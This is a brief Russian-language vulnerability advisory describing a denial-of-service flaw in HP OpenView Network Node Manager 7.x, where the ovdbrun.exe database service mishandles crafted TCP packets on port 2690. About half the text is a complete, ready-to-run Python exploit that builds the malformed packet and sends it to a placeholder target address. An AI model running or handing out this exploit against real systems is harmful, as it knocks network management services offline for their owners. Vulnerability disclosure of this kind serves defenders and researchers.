Программа: HP OpenView Network Node Manager (NNM) 7.x
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую
систему. Уязвимость существует из-за ошибки в проверке входных данных в сервисе
базы данных (ovdbrun.exe) при обработке TCP пакетов. Атакующий может передать
специально сформированные пакеты на TCP порт 2690, что приведет к отказу системы
в обслуживании.
Эксплоит:
#!python
import socket
import struct
a = struct.pack('<b', 2)
a += struct.pack('<H', 0)
a += struct.pack('<H',0xFEFF)
a += struct.pack('<H',0xFEFF)
a += "1234"
target_ip = 'X.X.X.X'
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect ((target_ip, 2690))
s.send(a)
s.close()